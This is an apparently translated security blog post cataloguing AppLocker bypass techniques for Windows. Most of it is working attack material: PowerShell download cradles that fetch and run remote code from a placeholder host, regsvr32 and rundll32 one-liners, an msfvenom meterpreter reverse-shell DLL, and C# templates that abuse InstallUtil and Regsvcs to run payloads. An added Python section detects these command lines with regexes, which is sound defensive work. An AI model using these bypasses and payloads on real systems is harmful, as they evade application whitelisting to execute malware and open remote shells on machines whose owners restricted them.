AppLocker Bypass Techniques

Source: https://www.youtube.com/watch?v=z04NXAkhI4k

0x00 cmd and PowerShell are not blocked, but scripts are

1. Execute directly from cmd or PowerShell

Powershell:

IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2. Pipe

Powershell:

Get-Content script.ps1 | iex

Command:

cmd.exe /K < payload.bat

3. HTA

payload.hta

4. Regsvr32.exe

regsvr32 /u /n /s /i:payload.sct scrobj.dll
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

payload.sct:


5. rundll32

payload:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

6. DLL / CPL

payload.dll

msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

Run:

rundll32 shell32.dll,Control_RunDLL payload.dll

Rename the DLL to .cpl and double-click it to run.

7. nishang file backdoor

nishang client

http://drops.wooyun.org/tips/8568

0x01 Executable directories

Use a PowerShell script to scan for writable paths

Download: http://go.mssec.se/AppLockerBC

Scanning for executable paths:

Bypassing AppLocker to execute:

0x02 After PowerShell is disabled

Configuring the rule that disables PowerShell

Opening PowerShell again after it has been disabled

1. Running PowerShell through .NET

Bypass by running PowerShell through .NET:

C# template

powershell.cs

using System;
using System.Management.Automation;
namespace Powershell
{
    class Program
    {
        static void Main(string[] args)
        {
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();
        }
    }
}

The compiled exe cannot be run directly; place it in an executable (whitelisted) directory and run it from there to invoke PowerShell.

2. InstallUtil

Reference 1: http://drops.wooyun.org/tips/8862

Reference 2: http://drops.wooyun.org/tips/8701

InstallUtil.cs

using System;
using System.Management.Automation;
namespace Whitelist
{
    class Program
    {
        static void Main(string[] args)
        {
        }
    }
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    // The overridden method can be Uninstall or Install. Install is transactional and really unnecessary here.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        PowerShell ps = PowerShell.Create();
        ps.AddCommand("Invoke-Expression");
        ps.AddArgument("payload");
        ps.Invoke();
    }
}

After compiling, run it with the /U parameter:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe

3. Regasm & Regsvcs

Regasm.cs

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Management.Automation;
namespace regsvcser
{
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

        [ComUnregisterFunction] // This executes if registration fails
        public static void UnRegisterClass(string key)
        {
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();
        }
    }
}

Usage:

Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll

4. nishang file backdoor

Although PowerShell is disabled, shellcode can still be executed, for example through HTA, macros and similar vectors.
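Added example (not from the original post): a small Python detector, written from the defender's side, that flags process-creation command lines matching the patterns listed in 0x00 and 0x02 (regsvr32 with scrobj.dll, rundll32 javascript: and Control_RunDLL, InstallUtil /U, regsvcs/regasm, the -exec bypass download cradle, and content piped into iex). The event format and the sample events are constructed for this example; the rules are plain regexes, not any vendor's signatures.

```python
"""Flag process-creation command lines (Sysmon event 1 / Security 4688
CommandLine field) that match the AppLocker bypass patterns on this page.
Sample events below are constructed for the example, not real telemetry."""
import re

# (label, case-insensitive regex over the command line)
RULES = [
    ("regsvr32 scriptlet via /i: and scrobj.dll",
     re.compile(r"regsvr32(\.exe)?\b.*\s/i:\S+.*scrobj\.dll", re.I)),
    ("rundll32 javascript: / RunHTMLApplication",
     re.compile(r"rundll32(\.exe)?\b.*(javascript:|RunHTMLApplication)", re.I)),
    ("rundll32 Control_RunDLL loading a DLL/CPL",
     re.compile(r"rundll32(\.exe)?\b.*shell32\.dll,Control_RunDLL\s+\S+", re.I)),
    ("InstallUtil /U uninstall callback",
     re.compile(r"installutil(\.exe)?\b.*\s/u\b", re.I)),
    ("regsvcs/regasm COM (un)registration",
     re.compile(r"\b(regsvcs|regasm)(\.exe)?\s", re.I)),
    ("PowerShell policy bypass with download cradle",
     re.compile(r"powershell.*-e(xec(utionpolicy)?|p)\s+bypass.*"
                r"(DownloadString|\bIEX\b|Invoke-Expression)", re.I)),
    ("script content piped into iex",
     re.compile(r"\|\s*(iex|Invoke-Expression)\b", re.I)),
]

def classify(cmdline: str) -> list:
    """Return the labels of every rule the command line matches (may be several)."""
    return [label for label, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return [(index, labels)] for the events that match at least one rule."""
    hits = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, labels) for i, labels in hits if labels]

# Constructed sample command lines; two are benign to show they stay quiet.
SAMPLE_EVENTS = [
    r"regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll",
    r"regsvr32 /s C:\Program Files\Vendor\vendor.dll",            # benign
    r"rundll32 shell32.dll,Control_RunDLL payload.dll",
    r'''rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')")''',
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll",
    r'powershell -c "Get-Content script.ps1 | iex"',
    r"powershell -File C:\scripts\backup.ps1",                    # benign
]

if __name__ == "__main__":
    for i, labels in scan(SAMPLE_EVENTS):
        print(f"[{i}] {SAMPLE_EVENTS[i][:60]} -> {labels}")
```

A legitimate `InstallUtil /u` or COM registration also trips these rules, so treat a hit as a triage prompt and correlate it with the parent process and the path of the loaded file rather than alerting on it alone.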

0x03 Privilege escalation

Once elevated to administrator, AppLocker's restrictions can be overcome and both exe files and scripts can be executed.

[Original author: evi1cg; compiled and published by mottoin]

Original article by Evi1cg. If reproduced, please credit the source: http://www.mottoin.com/89491.html
